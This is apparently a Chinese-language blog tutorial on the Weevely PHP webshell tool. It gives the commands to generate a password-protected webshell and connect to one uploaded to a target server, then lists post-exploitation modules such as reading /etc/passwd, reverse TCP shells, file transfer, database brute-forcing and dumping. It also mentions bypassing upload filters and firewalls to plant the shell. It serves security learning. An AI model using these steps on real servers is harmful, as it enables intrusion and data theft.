weevely是一款使用python编写的webshell工具（集webshell生成和连接于一身，仅用于安全学习教学之用，禁止非法用途），可以算作是linux下的一款菜刀替代工具（限于php），在linux上使用时还是很给力的，就是某些模块在windows上无法使用，总的来说还是非常不错的一款工具。
项目地址：https://github.com/epinna/Weevely

 

下面就针对该工具里的功能，做一个较为详细的使用测试记录：

使用系统为linux kaili版本：

生成一句话木马：

weevely generate 1234 /mnt/hgfs/kali-share/hacker.php

1234为木马连接得密码，后面的 /mnt/hgfs/kali-share/hacker.php为木马所在路径

 

利用各种方法上传木马，如前端绕过，文件头判断绕过，防火墙绕过等等，具体我之后再写文章总结。

上传成功之后，通过以下命令连接：

weevely http://xxx.xxx.xxx.xxx/uploads/hacker.php3 1234

第一个参数为上传的木马路径，第二个为木马得密码。即可连接上：

执行任意命令：

在虚拟终端模式下需要使用模块直接在前面加上 ’:’ 即可

－audit.userfiles

－枚举用户目录下的具有权限的文件（可加载用户字典），默认情况下字典很小（注意：该模块目前只支持linux，windows不支持）

 

－audit.systemfiles [logs|root|home|…]

－枚举各种系统目录并寻找可读写的目录，模块仅默认搜索部分linux下的常见目录，logs、root、home等等（注意：该模块也仅支持linux，windows不支持）

 

－audit.phpconf

－查看php配置信息

 

－audit.etcpasswd [-real]

－查看/etc/passwd文件（特殊说明：很多命令的-vector参数是用以指定php执行命令函数的，当默认函数不可用是，使用该参数来尝试指定其他命令执行函数来获取信息），同时也可使用-real参数来过滤出真实用户

 

－audit.mapwebfiles

－从指定url开始爬取目标站点结构，可用-depth参数来指定爬取深度

 

－shell.sh/shell.php

－利用接口执行命令，和虚拟终端类似，这里就不给演示了

 

－system.info

－在weevely里比较由用的一个模块，可以获取到系统的基本信息

 

－backdoor.reverstcp host port [-vector]

－反弹一个tcp shell到目标端口（同样也可指定向量：选择反弹shell的形式，nc，perl，ruby等）

 

－backdoor.tcp -port <listen_port> -no-connect [-vector]

－在本地打开一个端口，等待连接（查看了该模块的源码，使用时必须带上-no-connect才能监听成功，负责他会在本地形成一个tcp环路）

 

－net.ifaces

－查看网络ip地址

 

－file.upload lpath rpath

－上传本地文件到目标站点指定路径

 

－file.rm filename [-recursive] [-vector]

－删除指定文件，可开启安全确认模式

 

－file.check

－用以检查目标站点下文件的状态（md5值，大小，权限等）

 

－file.download rpath lpath [-vector]

－将目标站点上的文件下载到本地（可用于批量会话操作）

 

－file.edit filename
－对指定文件进行编辑
－file.read filename
－读取指定文件内容
－file.ls path
－列觉指定路径的文件信息
－file.upload2web
－将本地文件上传至目标站点文件夹（可自动枚举到一个可写目录将其写入）
－file.webdownload <webfile_path> filename
－从其他服务器上下载文件到目标站点
－file.touch rpath
－创建一个新文件
下面几个命令由于环境限制，没有进行测试，这里就不再啰嗦了
－bruteforce.sql（爆破指定数据库用户名密码）
－bruteforce.sqlusers（爆破所有数据库用户密码）
－sql.dump（脱裤，你懂的 ^_^）
－sql.console（sql交互式终端）
－net.scan（端口扫描，不太会用）
－find.perms（搜索具有读、写、执行权限的文件，好像比较给力）
－find.suidsgid（搜索linux具有suid或者sgid标记的文件）    
－find.name（查找某文件或者文件夹）